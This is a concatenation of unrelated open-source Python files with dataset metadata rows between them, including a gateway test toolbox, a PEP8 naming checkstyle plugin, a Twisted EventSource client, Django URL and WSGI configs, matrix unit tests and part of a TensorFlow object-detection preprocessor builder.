logger.info('health check done')
@contextmanager
def disabled_self_recovery(self):
try:
self.dut.get('/set_self_recovery', {'active': False})
yield self
finally:
self.dut.get('/set_self_recovery', {'active': True})
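    # Usage sketch (assumed): wrap disruptive steps so the gateway does not
    # try to recover itself mid-test, e.g.
    #   with toolbox.disabled_self_recovery():
    #       toolbox.power_off()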
def health_check(self, timeout=30, skip_assert=False):
# type: (float, bool) -> List[str]
since = time.time()
pending = ['unknown']
while since > time.time() - timeout:
try:
data = self.dut.get('/health_check', use_token=False, success=False, timeout=5)
pending = [k for k, v in data['health'].items() if not v['state']]
if not pending:
return pending
logger.debug('wait for health check, {}'.format(pending))
except Exception:
pass
time.sleep(10)
if not skip_assert:
assert pending == []
return pending
def module_error_check(self):
# type: () -> None
data = self.dut.get('/get_errors')
for module, count in data['errors']:
# TODO just fail?
if count != 0:
logger.warning('master reported errors {} {}'.format(module, count))
def configure_output(self, output, config):
# type: (Output, Dict[str,Any]) -> None
config_data = {'id': output.output_id}
config_data.update(**config)
logger.debug('configure output {} with {}'.format(output, config))
self.dut.get('/set_output_configuration', {'config': json.dumps(config_data)})
def ensure_output(self, output, status, config=None):
# type: (Output, int, Optional[Dict[str,Any]]) -> None
if config:
self.configure_output(output, config)
hypothesis.note('ensure output {} is {}'.format(output, status))
logger.debug('ensure output {} is {}'.format(output, status))
time.sleep(0.2)
self.set_output(output, status)
time.sleep(0.2)
self.tester.reset()
def set_output(self, output, status):
# type: (Output, int) -> None
logger.debug('set output {} -> {}'.format(output, status))
self.dut.get('/set_output', {'id': output.output_id, 'is_on': status})
def configure_shutter(self, shutter, config):
# type: (Shutter, Dict[str, Any]) -> None
config_data = {'id': shutter.shutter_id}
config_data.update(**config)
logger.debug('configure shutter {} with {}'.format(shutter, config))
self.dut.get('/set_shutter_configuration', {'config': json.dumps(config_data)})
def set_shutter(self, shutter, direction):
# type: (Shutter, str) -> None
self.dut.get('/do_shutter_{}'.format(direction), {'id': shutter.shutter_id})
def lock_shutter(self, shutter, locked):
# type: (Shutter, bool) -> None
self.dut.get('/do_basic_action', {'action_type': 113, 'action_number': 1 if locked else 0})
def press_input(self, _input):
# type: (Input) -> None
self.tester.get('/set_output', {'id': _input.tester_output_id, 'is_on': False}) # ensure start status
time.sleep(0.2)
self.tester.reset()
hypothesis.note('After input {} pressed'.format(_input))
self.tester.toggle_output(_input.tester_output_id, is_dimmer=_input.is_dimmer)
logger.debug('Toggled {} -> True -> False'.format(_input))
def assert_shutter_changed(self, shutter, from_status, to_status, timeout=5, inverted=False):
        # type: (Shutter, str, str, float, bool) -> None
hypothesis.note('assert {} status changed {} -> {}'.format(shutter, from_status, to_status))
input_id_up = shutter.tester_input_id_down if inverted else shutter.tester_input_id_up
input_id_down = shutter.tester_input_id_up if inverted else shutter.tester_input_id_down
start = time.time()
self.assert_shutter_status(shutter=shutter,
status=to_status,
timeout=timeout,
inverted=inverted)
if from_status != to_status:
up_ok = True
if (from_status == 'going_up') != (to_status == 'going_up'):
up_ok = self.tester.receive_input_event(entity=shutter,
input_id=input_id_up,
input_status=to_status == 'going_up',
between=(0, Toolbox._remaining_timeout(timeout, start)))
down_ok = True
if (from_status == 'going_down') != (to_status == 'going_down'):
down_ok = self.tester.receive_input_event(entity=shutter,
input_id=input_id_down,
input_status=to_status == 'going_down',
between=(0, Toolbox._remaining_timeout(timeout, start)))
if not up_ok or not down_ok:
raise AssertionError('expected events {} status={}, up_ok={}, down_ok={}'.format(shutter, to_status, up_ok, down_ok))
def assert_output_changed(self, output, status, between=(0, 5)):
# type: (Output, bool, Tuple[float,float]) -> None
hypothesis.note('assert {} status changed {} -> {}'.format(output, not status, status))
if self.tester.receive_input_event(entity=output,
input_id=output.tester_input_id,
input_status=status,
between=between):
return
raise AssertionError('expected event {} status={}'.format(output, status))
def assert_output_status(self, output, status, timeout=5):
# type: (Output, bool, float) -> None
hypothesis.note('assert output {} status is {}'.format(output, status))
if self.tester.wait_for_input_status(entity=output,
input_id=output.tester_input_id,
input_status=status,
timeout=timeout):
return
raise AssertionError('Expected {} status={}'.format(output, status))
def assert_shutter_status(self, shutter, status, timeout=5, inverted=False):
        # type: (Shutter, str, float, bool) -> None
input_id_up = shutter.tester_input_id_down if inverted else shutter.tester_input_id_up
input_id_down = shutter.tester_input_id_up if inverted else shutter.tester_input_id_down
start = time.time()
up_ok = self.tester.wait_for_input_status(entity=shutter,
input_id=input_id_up,
input_status=status == 'going_up',
timeout=Toolbox._remaining_timeout(timeout, start))
down_ok = self.tester.wait_for_input_status(entity=shutter,
input_id=input_id_down,
input_status=status == 'going_down',
timeout=Toolbox._remaining_timeout(timeout, start))
if not up_ok or not down_ok:
raise AssertionError('Expected {} status={}, up_ok={}, down_ok={}'.format(shutter, status, up_ok, down_ok))
def ensure_output_exists(self, output, timeout=30):
# type: (Output, float) -> None
since = time.time()
while since > time.time() - timeout:
data = self.dut.get('/get_output_status')
try:
next(x for x in data['status'] if x['id'] == output.output_id)
logger.debug('output {} with status discovered, after {:.2f}s'.format(output, time.time() - since))
return
except StopIteration:
pass
time.sleep(2)
raise AssertionError('output {} status missing, timeout after {:.2f}s'.format(output, time.time() - since))
def ensure_shutter_exists(self, _shutter, timeout=30):
# type: (Shutter, float) -> None
since = time.time()
while since > time.time() - timeout:
data = self.dut.get('/get_shutter_status')
if str(_shutter.shutter_id) in data['detail']:
logger.debug('shutter {} with status discovered, after {:.2f}s'.format(_shutter, time.time() - since))
return
time.sleep(2)
raise AssertionError('shutter {} status missing, timeout after {:.2f}s'.format(_shutter, time.time() - since))
def ensure_input_exists(self, _input, timeout=30):
# type: (Input, float) -> None
since = time.time()
while since > time.time() - timeout:
data = self.dut.get('/get_input_status')
try:
next(x for x in data['status'] if x['id'] == _input.input_id)
logger.debug('input {} with status discovered, after {:.2f}s'.format(_input, time.time() - since))
return
except StopIteration:
pass
time.sleep(2)
raise AssertionError('input {} status missing, timeout after {:.2f}s'.format(_input, time.time() - since))
@staticmethod
def _remaining_timeout(timeout, start):
return timeout - time.time() + start
| agpl-3.0 | 4,625,946,587,529,712,000 | 46.337612 | 185 | 0.566764 | false |
foursquare/pants | contrib/python/src/python/pants/contrib/python/checks/tasks/checkstyle/variable_names.py | 1 | 4706 | # coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import, division, print_function, unicode_literals
import ast
import keyword
import re
from functools import wraps
import six
from pants.contrib.python.checks.tasks.checkstyle.common import CheckstylePlugin
ALL_LOWER_CASE_RE = re.compile(r'^[a-z][a-z\d]*$')
ALL_UPPER_CASE_RE = re.compile(r'^[A-Z][A-Z\d]+$')
LOWER_SNAKE_RE = re.compile(r'^([a-z][a-z\d]*)(_[a-z\d]+)*$')
UPPER_SNAKE_RE = re.compile(r'^([A-Z][A-Z\d]*)(_[A-Z\d]+)*$')
UPPER_CAMEL_RE = re.compile(r'^([A-Z][a-z\d]*)+$')
RESERVED_NAMES = frozenset(keyword.kwlist)
BUILTIN_NAMES = dir(six.moves.builtins)
def allow_underscores(num):
def wrap(function):
@wraps(function)
def wrapped_function(name):
if name.startswith('_' * (num + 1)):
return False
return function(name.lstrip('_'))
return wrapped_function
return wrap
@allow_underscores(1)
def is_upper_camel(name):
"""UpperCamel, AllowingHTTPAbbrevations, _WithUpToOneUnderscoreAllowable."""
return bool(UPPER_CAMEL_RE.match(name) and not ALL_UPPER_CASE_RE.match(name))
@allow_underscores(2)
def is_lower_snake(name):
"""lower_snake_case, _with, __two_underscores_allowable."""
return LOWER_SNAKE_RE.match(name) is not None
def is_reserved_name(name):
return name in BUILTIN_NAMES or name in RESERVED_NAMES
def is_reserved_with_trailing_underscore(name):
"""For example, super_, id_, type_"""
if name.endswith('_') and not name.endswith('__'):
return is_reserved_name(name[:-1])
return False
def is_builtin_name(name):
"""For example, __foo__ or __bar__."""
if name.startswith('__') and name.endswith('__'):
return ALL_LOWER_CASE_RE.match(name[2:-2]) is not None
return False
@allow_underscores(2)
def is_constant(name):
return UPPER_SNAKE_RE.match(name) is not None
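# Illustrative expectations for the predicates above (derived from the
# regexes, not an exhaustive spec):
#   is_upper_camel('HTTPServer') -> True (abbreviations allowed)
#   is_lower_snake('__foo_bar') -> True (up to two leading underscores)
#   is_constant('MAX_SIZE') -> True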
class PEP8VariableNames(CheckstylePlugin):
"""Enforces PEP8 recommendations for variable names.
Specifically:
UpperCamel class names
lower_snake / _lower_snake / __lower_snake function names
lower_snake expression variable names
CLASS_LEVEL_CONSTANTS = {}
GLOBAL_LEVEL_CONSTANTS = {}
"""
CLASS_GLOBAL_BUILTINS = frozenset((
'__slots__',
'__metaclass__',
))
def iter_class_methods(self, class_node):
for node in class_node.body:
if isinstance(node, ast.FunctionDef):
yield node
def iter_class_globals(self, class_node):
for node in class_node.body:
# TODO(wickman) Occasionally you have the pattern where you set methods equal to each other
# which should be allowable, for example:
# class Foo(object):
# def bar(self):
# pass
# alt_bar = bar
if isinstance(node, ast.Assign):
for name in node.targets:
if isinstance(name, ast.Name):
yield name
def nits(self):
class_methods = set()
all_methods = set(function_def for function_def in ast.walk(self.python_file.tree)
if isinstance(function_def, ast.FunctionDef))
for class_def in self.iter_ast_types(ast.ClassDef):
if not is_upper_camel(class_def.name):
yield self.error('T000', 'Classes must be UpperCamelCased', class_def)
for class_global in self.iter_class_globals(class_def):
if not is_constant(class_global.id) and class_global.id not in self.CLASS_GLOBAL_BUILTINS:
yield self.error('T001', 'Class globals must be UPPER_SNAKE_CASED', class_global)
if not class_def.bases or all(isinstance(base, ast.Name) and base.id == 'object'
for base in class_def.bases):
class_methods.update(self.iter_class_methods(class_def))
else:
# If the class is inheriting from anything that is potentially a bad actor, rely
# upon checking that bad actor out of band. Fixes PANTS-172.
for method in self.iter_class_methods(class_def):
all_methods.discard(method)
for function_def in all_methods - class_methods:
if is_reserved_name(function_def.name):
yield self.error('T801', 'Method name overrides a builtin.', function_def)
# TODO(wickman) Only enforce this for classes that derive from object. If they
# don't derive object, it's possible that the superclass naming is out of its
# control.
for function_def in all_methods:
if not any((is_lower_snake(function_def.name),
is_builtin_name(function_def.name),
is_reserved_with_trailing_underscore(function_def.name))):
yield self.error('T002', 'Method names must be lower_snake_cased', function_def)
| apache-2.0 | -250,211,113,857,295,550 | 33.602941 | 98 | 0.671058 | false |
avigad/boole | old/expr_examples.py | 1 | 2607 | ################################################################################
#
# expr_examples.py
#
################################################################################
from boole.core.model import *
################################################################################
#
# Examples
#
################################################################################
if __name__ == '__main__':
print "Built-in language:"
print
built_in_language.show()
print
i, j, k = Int('i j k')
x = Const('x', Real)
    y, z = Real('y z')
p, q, r = Bool('p q r')
A = BasicType('A')
B = BasicType('B')
f = (A >> B)('f')
g = Const('g', A * A >> B)
a1, a2 = A('a1 a2')
print 'Global language:'
print
global_language.show()
print
def check(e):
print 'Expression:', e
try:
etype = e.etype()
except TypeError as err:
print 'Type error:', err
else:
print 'Type:', etype
print
check(j)
check(i + j)
check(x)
check(x + i)
check(i + rr(4.2))
check(f(a1))
check(f(a1, a2))
check(g(a1))
check(g(a1, a2))
check(ii(42))
check(rr(42))
adder = Abs([i, j], i + j)
check(adder)
check(adder(i, ii(3)))
check(plus)
check(x ** ii(2) + ii(3) * x + ii(7))
check(j ** ii(2) + ii(3) * j + ii(7))
check(Sum(x ** ii(2), ii(3) * x, ii(7)))
check(Sum(j ** ii(2), ii(3) * j, ii(7)))
check((x * rr(3.0) >= ii(17)) & (p | q))
check(x + p)
check(p & q)
check(And(p,q))
check(And(p, q, r))
check(~And(p, ~q, (r | p)))
check(Forall(x, x == x))
check(Forall([x, y], x == y))
check(Exists([x, y], (rr(0) < x) & (x + y < rr(3))))
L = Language()
set_default_language(L)
m, n, p, q = Int('m n p q')
prime = Const('Prime', Int >> Bool)
even = Const('Even', Int >> Bool)
f = (Int >> Int)('f')
People = EnumType('People', ['Alice', 'Bob', 'Cathy'])
Alice, Bob, Cathy = People.make_constants()
x = People('x')
print 'Language L:'
print
L.show()
print
check (Forall([f, m, n], f(m) == f(n)))
def precond(n):
return (ii(2) < n) & even(n)
def goldbach(n):
return Exists([p,q], (precond(n)) >>
(prime(p) & prime(q) & (p + q == n)))
Goldbach = Forall(n, goldbach(n))
check(Goldbach)
check(Forall(x, (x == Alice) | (x == Bob) | (x == Cathy)))
check(Forall(x, (x == Alice) | (x == Bob)))
| apache-2.0 | -8,128,380,361,066,723,000 | 23.364486 | 80 | 0.392789 | false |
warner/petmail | src/petmail/eventsource.py | 1 | 7209 | from twisted.python import log, failure
from twisted.internet import reactor, defer, protocol
from twisted.application import service
from twisted.protocols import basic
from twisted.web.client import Agent, ResponseDone
from twisted.web.http_headers import Headers
from .eventual import eventually
class EventSourceParser(basic.LineOnlyReceiver):
delimiter = "\n"
def __init__(self, handler):
self.current_field = None
self.current_lines = []
self.handler = handler
self.done_deferred = defer.Deferred()
def connectionLost(self, why):
if why.check(ResponseDone):
why = None
self.done_deferred.callback(why)
def dataReceived(self, data):
# exceptions here aren't being logged properly, and tests will hang
# rather than halt. I suspect twisted.web._newclient's
# HTTP11ClientProtocol.dataReceived(), which catches everything and
# responds with self._giveUp() but doesn't log.err.
try:
basic.LineOnlyReceiver.dataReceived(self, data)
except:
log.err()
raise
def lineReceived(self, line):
if not line:
# blank line ends the field
self.fieldReceived(self.current_field,
"\n".join(self.current_lines))
self.current_field = None
self.current_lines[:] = []
return
if self.current_field is None:
self.current_field, data = line.split(": ", 1)
self.current_lines.append(data)
else:
self.current_lines.append(line)
def fieldReceived(self, name, data):
self.handler(name, data)
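# Note on this parser's framing: "name: line1\nline2\n\n" invokes
# handler('name', 'line1\nline2'); the blank line terminates the field.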
class EventSourceError(Exception):
pass
# es = EventSource(url, handler)
# d = es.start()
# es.cancel()
class EventSource: # TODO: service.Service
def __init__(self, url, handler, when_connected=None):
self.url = url
self.handler = handler
self.when_connected = when_connected
self.started = False
self.cancelled = False
self.proto = EventSourceParser(self.handler)
def start(self):
assert not self.started, "single-use"
self.started = True
a = Agent(reactor)
d = a.request("GET", self.url,
Headers({"accept": ["text/event-stream"]}))
d.addCallback(self._connected)
return d
def _connected(self, resp):
if resp.code != 200:
raise EventSourceError("%d: %s" % (resp.code, resp.phrase))
if self.when_connected:
self.when_connected()
#if resp.headers.getRawHeaders("content-type") == ["text/event-stream"]:
resp.deliverBody(self.proto)
if self.cancelled:
self.kill_connection()
return self.proto.done_deferred
def cancel(self):
self.cancelled = True
if not self.proto.transport:
            # _connected hasn't been called yet, but the self.cancelled flag
            # set above will take care of it when the connection is established
def kill(data):
# this should kill it as soon as any data is delivered
raise ValueError("dead")
self.proto.dataReceived = kill # just in case
return
self.kill_connection()
def kill_connection(self):
if (hasattr(self.proto.transport, "_producer")
and self.proto.transport._producer):
# This is gross and fragile. We need a clean way to stop the
# client connection. p.transport is a
# twisted.web._newclient.TransportProxyProducer , and its
# ._producer is the tcp.Port.
self.proto.transport._producer.loseConnection()
else:
log.err("get_events: unable to stop connection")
# oh well
#err = EventSourceError("unable to cancel")
try:
self.proto.done_deferred.callback(None)
except defer.AlreadyCalledError:
pass
class Connector:
# behave enough like an IConnector to appease ReconnectingClientFactory
def __init__(self, res):
self.res = res
def connect(self):
self.res._maybeStart()
def stopConnecting(self):
self.res._stop_eventsource()
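# Usage sketch, mirroring the EventSource notes above (wiring assumed):
# res = ReconnectingEventSource(baseurl, connection_starting, handler)
# res.startService(); res.activate()
# ...
# d = res.deactivate() # fires once the connection is fully stopped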
class ReconnectingEventSource(service.MultiService,
protocol.ReconnectingClientFactory):
def __init__(self, baseurl, connection_starting, handler):
service.MultiService.__init__(self)
# we don't use any of the basic Factory/ClientFactory methods of
# this, just the ReconnectingClientFactory.retry, stopTrying, and
# resetDelay methods.
self.baseurl = baseurl
self.connection_starting = connection_starting
self.handler = handler
# IService provides self.running, toggled by {start,stop}Service.
# self.active is toggled by {,de}activate. If both .running and
# .active are True, then we want to have an outstanding EventSource
# and will start one if necessary. If either is False, then we don't
# want one to be outstanding, and will initiate shutdown.
self.active = False
self.connector = Connector(self)
self.es = None # set we have an outstanding EventSource
self.when_stopped = [] # list of Deferreds
def isStopped(self):
return not self.es
def startService(self):
service.MultiService.startService(self) # sets self.running
self._maybeStart()
def stopService(self):
# clears self.running
d = defer.maybeDeferred(service.MultiService.stopService, self)
d.addCallback(self._maybeStop)
return d
def activate(self):
assert not self.active
self.active = True
self._maybeStart()
def deactivate(self):
assert self.active # XXX
self.active = False
return self._maybeStop()
def _maybeStart(self):
if not (self.active and self.running):
return
self.continueTrying = True
url = self.connection_starting()
self.es = EventSource(url, self.handler, self.resetDelay)
d = self.es.start()
d.addBoth(self._stopped)
def _stopped(self, res):
self.es = None
# we might have stopped because of a connection error, or because of
# an intentional shutdown.
if self.active and self.running:
# we still want to be connected, so schedule a reconnection
if isinstance(res, failure.Failure):
log.err(res)
self.retry() # will eventually call _maybeStart
return
# intentional shutdown
self.stopTrying()
for d in self.when_stopped:
eventually(d.callback, None)
self.when_stopped = []
def _stop_eventsource(self):
if self.es:
eventually(self.es.cancel)
def _maybeStop(self, _=None):
self.stopTrying() # cancels timer, calls _stop_eventsource()
if not self.es:
return defer.succeed(None)
d = defer.Deferred()
self.when_stopped.append(d)
return d
| mit | 1,099,797,958,269,554,300 | 34.165854 | 80 | 0.609793 | false |
anilpai/leetcode | Tests/test_matrix.py | 1 | 1516 | from unittest import TestCase
from Matrix.MatrixInSpiral import Solution as a
from Matrix.MatrixRotate90deg import Solution as b
from Matrix.RotateMatrix import Solution as c
class TestSolution(TestCase):
def test_spiralmatrix(self):
r = a()
matrix = [
[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12],
[13, 14, 15, 16]
]
self.assertListEqual(r.SpiralMatrix(matrix), [1, 2, 3, 4, 8, 12, 16, 15, 14, 13, 9, 5, 6, 7, 11, 10],'Spiral Matrix')
def test_matrixRotate(self):
r = b()
matrix = [
[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12],
[13, 14, 15, 16]
]
self.assertListEqual(r.Rotate90Clock(matrix), [[13, 9, 5, 1], [14, 10, 6, 2], [15, 11, 7, 3], [16, 12, 8, 4]], 'Rotate 90 clockwise')
self.assertListEqual(r.Rotate90CounterClock(matrix), [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12], [13, 14, 15, 16]], 'Rotate 90 anti-clockwise')
def test_matrixMove(self):
r = c()
matrix = [
[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12],
[13, 14, 15, 16]
]
self.assertListEqual(r.rotateMatrixClockwise(matrix), [[5, 1, 2, 3], [9, 10, 6, 4], [13, 11, 7, 8], [14, 15, 16, 12]], 'Rotate one step clockwise')
self.assertListEqual(r.rotateMatrixCounterClockwise(matrix), [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12], [13, 14, 15, 16]], 'Rotate one step anti-clockwise') | mit | -5,891,117,889,782,187,000 | 38.921053 | 167 | 0.509235 | false |
boblefrag/lolyx | lolyx/urls.py | 1 | 1605 | # -*- coding: utf-8 -*- pylint: disable-msg=R0801
#
# Copyright (c) 2013 Rodolphe Quiédeville <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from django.contrib import admin
from django.conf.urls import patterns, include, url
from django.views.generic import RedirectView
from django.core.urlresolvers import reverse_lazy
# Uncomment the next two lines to enable the admin:
admin.autodiscover()
urlpatterns = patterns(
'',
url(r'^admin/', include(admin.site.urls)),
url(r'^accounts/', include('registration.urls')),
url(r'^cv/', include('lolyx.resume.urls')),
url(r'^offres/', include('lolyx.resume.urls')),
url(r'^accounts/profile/$', 'lolyx.llx.views.profile'),
url(r'^$', 'lolyx.llx.views.home', name='home'),
url(r'^search/cv/$', RedirectView.as_view(url=reverse_lazy('resume'))),
    # TODO: Use reverse_lazy instead of hardcoding the path
url(r'^search/cv/date.php$', RedirectView.as_view(url='/cv/date/')),
)
| gpl-3.0 | 8,413,431,553,604,031,000 | 42.351351 | 75 | 0.700748 | false |
JanMalte/secondhandshop_server | src/secondhandshop_server/wsgi.py | 1 | 1582 | """
WSGI config for Second-Hand-Shop Server project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
from os.path import abspath, dirname
from sys import path
SITE_ROOT = dirname(dirname(abspath(__file__)))
path.append(SITE_ROOT)
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "jajaja.settings"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "secondhandshop_server.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
| mit | 1,794,648,453,947,780,000 | 40.631579 | 81 | 0.790771 | false |
tensorflow/models | research/object_detection/builders/preprocessor_builder.py | 1 | 18154 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Builder for preprocessing steps."""
import tensorflow.compat.v1 as tf
from object_detection.core import preprocessor
from object_detection.protos import preprocessor_pb2
def _get_step_config_from_proto(preprocessor_step_config, step_name):
"""Returns the value of a field named step_name from proto.
Args:
preprocessor_step_config: A preprocessor_pb2.PreprocessingStep object.
step_name: Name of the field to get value from.
Returns:
result_dict: a sub proto message from preprocessor_step_config which will be
later converted to a dictionary.
Raises:
ValueError: If field does not exist in proto.
"""
for field, value in preprocessor_step_config.ListFields():
if field.name == step_name:
return value
raise ValueError('Could not get field %s from proto!' % step_name)
def _get_dict_from_proto(config):
"""Helper function to put all proto fields into a dictionary.
  For many preprocessing steps, there's a trivial 1-1 mapping from proto fields
to function arguments. This function automatically populates a dictionary with
the arguments from the proto.
Protos that CANNOT be trivially populated include:
* nested messages.
* steps that check if an optional field is set (ie. where None != 0).
* protos that don't map 1-1 to arguments (ie. list should be reshaped).
* fields requiring additional validation (ie. repeated field has n elements).
Args:
config: A protobuf object that does not violate the conditions above.
Returns:
result_dict: |config| converted into a python dictionary.
"""
result_dict = {}
for field, value in config.ListFields():
result_dict[field.name] = value
return result_dict
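# For example (hypothetical step config): a random_adjust_brightness step with
# max_delta=0.2 converts to {'max_delta': 0.2}, which build() below passes as
# kwargs to preprocessor.random_adjust_brightness.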
# A map from a PreprocessingStep proto config field name to the preprocessing
# function that should be used. The PreprocessingStep proto should be parsable
# with _get_dict_from_proto.
PREPROCESSING_FUNCTION_MAP = {
'normalize_image':
preprocessor.normalize_image,
'random_pixel_value_scale':
preprocessor.random_pixel_value_scale,
'random_image_scale':
preprocessor.random_image_scale,
'random_rgb_to_gray':
preprocessor.random_rgb_to_gray,
'random_adjust_brightness':
preprocessor.random_adjust_brightness,
'random_adjust_contrast':
preprocessor.random_adjust_contrast,
'random_adjust_hue':
preprocessor.random_adjust_hue,
'random_adjust_saturation':
preprocessor.random_adjust_saturation,
'random_distort_color':
preprocessor.random_distort_color,
'random_crop_to_aspect_ratio':
preprocessor.random_crop_to_aspect_ratio,
'random_black_patches':
preprocessor.random_black_patches,
'random_jpeg_quality':
preprocessor.random_jpeg_quality,
'random_downscale_to_target_pixels':
preprocessor.random_downscale_to_target_pixels,
'random_patch_gaussian':
preprocessor.random_patch_gaussian,
'rgb_to_gray':
preprocessor.rgb_to_gray,
'scale_boxes_to_pixel_coordinates':
(preprocessor.scale_boxes_to_pixel_coordinates),
'subtract_channel_mean':
preprocessor.subtract_channel_mean,
'convert_class_logits_to_softmax':
preprocessor.convert_class_logits_to_softmax,
'adjust_gamma':
preprocessor.adjust_gamma,
}
# A map to convert from preprocessor_pb2.ResizeImage.Method enum to
# tf.image.ResizeMethod.
RESIZE_METHOD_MAP = {
preprocessor_pb2.ResizeImage.AREA: tf.image.ResizeMethod.AREA,
preprocessor_pb2.ResizeImage.BICUBIC: tf.image.ResizeMethod.BICUBIC,
preprocessor_pb2.ResizeImage.BILINEAR: tf.image.ResizeMethod.BILINEAR,
preprocessor_pb2.ResizeImage.NEAREST_NEIGHBOR: (
tf.image.ResizeMethod.NEAREST_NEIGHBOR),
}
def get_random_jitter_kwargs(proto):
return {
'ratio':
proto.ratio,
'jitter_mode':
preprocessor_pb2.RandomJitterBoxes.JitterMode.Name(proto.jitter_mode
).lower()
}
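# Usage sketch for build() (the proto text and variable names here are
# illustrative assumptions):
#   step = preprocessor_pb2.PreprocessingStep()
#   text_format.Merge('random_horizontal_flip {}', step)
#   function, kwargs = build(step)
#   # later, inside the input pipeline, the pair is applied to the tensors:
#   # tensor_dict = preprocessor.preprocess(tensor_dict, [(function, kwargs)])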
def build(preprocessor_step_config):
"""Builds preprocessing step based on the configuration.
Args:
preprocessor_step_config: PreprocessingStep configuration proto.
Returns:
function, argmap: A callable function and an argument map to call function
with.
Raises:
ValueError: On invalid configuration.
"""
step_type = preprocessor_step_config.WhichOneof('preprocessing_step')
if step_type in PREPROCESSING_FUNCTION_MAP:
preprocessing_function = PREPROCESSING_FUNCTION_MAP[step_type]
step_config = _get_step_config_from_proto(preprocessor_step_config,
step_type)
function_args = _get_dict_from_proto(step_config)
return (preprocessing_function, function_args)
if step_type == 'random_horizontal_flip':
config = preprocessor_step_config.random_horizontal_flip
return (preprocessor.random_horizontal_flip,
{
'keypoint_flip_permutation': tuple(
config.keypoint_flip_permutation) or None,
'probability': config.probability or None,
})
if step_type == 'random_vertical_flip':
config = preprocessor_step_config.random_vertical_flip
return (preprocessor.random_vertical_flip,
{
'keypoint_flip_permutation': tuple(
config.keypoint_flip_permutation) or None,
'probability': config.probability or None,
})
if step_type == 'random_rotation90':
config = preprocessor_step_config.random_rotation90
return (preprocessor.random_rotation90,
{
'keypoint_rot_permutation': tuple(
config.keypoint_rot_permutation) or None,
'probability': config.probability or None,
})
if step_type == 'random_crop_image':
config = preprocessor_step_config.random_crop_image
return (preprocessor.random_crop_image,
{
'min_object_covered': config.min_object_covered,
'aspect_ratio_range': (config.min_aspect_ratio,
config.max_aspect_ratio),
'area_range': (config.min_area, config.max_area),
'overlap_thresh': config.overlap_thresh,
'clip_boxes': config.clip_boxes,
'random_coef': config.random_coef,
})
if step_type == 'random_pad_image':
config = preprocessor_step_config.random_pad_image
min_image_size = None
if (config.HasField('min_image_height') !=
config.HasField('min_image_width')):
raise ValueError('min_image_height and min_image_width should be either '
'both set or both unset.')
if config.HasField('min_image_height'):
min_image_size = (config.min_image_height, config.min_image_width)
max_image_size = None
if (config.HasField('max_image_height') !=
config.HasField('max_image_width')):
raise ValueError('max_image_height and max_image_width should be either '
'both set or both unset.')
if config.HasField('max_image_height'):
max_image_size = (config.max_image_height, config.max_image_width)
pad_color = config.pad_color or None
if pad_color:
if len(pad_color) != 3:
tf.logging.warn('pad_color should have 3 elements (RGB) if set!')
pad_color = tf.cast([x for x in config.pad_color], dtype=tf.float32)
return (preprocessor.random_pad_image,
{
'min_image_size': min_image_size,
'max_image_size': max_image_size,
'pad_color': pad_color,
})
if step_type == 'random_absolute_pad_image':
config = preprocessor_step_config.random_absolute_pad_image
max_height_padding = config.max_height_padding or 1
max_width_padding = config.max_width_padding or 1
pad_color = config.pad_color or None
if pad_color:
if len(pad_color) != 3:
tf.logging.warn('pad_color should have 3 elements (RGB) if set!')
pad_color = tf.cast([x for x in config.pad_color], dtype=tf.float32)
return (preprocessor.random_absolute_pad_image,
{
'max_height_padding': max_height_padding,
'max_width_padding': max_width_padding,
'pad_color': pad_color,
})
if step_type == 'random_crop_pad_image':
config = preprocessor_step_config.random_crop_pad_image
min_padded_size_ratio = config.min_padded_size_ratio
if min_padded_size_ratio and len(min_padded_size_ratio) != 2:
raise ValueError('min_padded_size_ratio should have 2 elements if set!')
max_padded_size_ratio = config.max_padded_size_ratio
if max_padded_size_ratio and len(max_padded_size_ratio) != 2:
raise ValueError('max_padded_size_ratio should have 2 elements if set!')
pad_color = config.pad_color or None
if pad_color:
if len(pad_color) != 3:
tf.logging.warn('pad_color should have 3 elements (RGB) if set!')
pad_color = tf.cast([x for x in config.pad_color], dtype=tf.float32)
kwargs = {
'min_object_covered': config.min_object_covered,
'aspect_ratio_range': (config.min_aspect_ratio,
config.max_aspect_ratio),
'area_range': (config.min_area, config.max_area),
'overlap_thresh': config.overlap_thresh,
'clip_boxes': config.clip_boxes,
'random_coef': config.random_coef,
'pad_color': pad_color,
}
if min_padded_size_ratio:
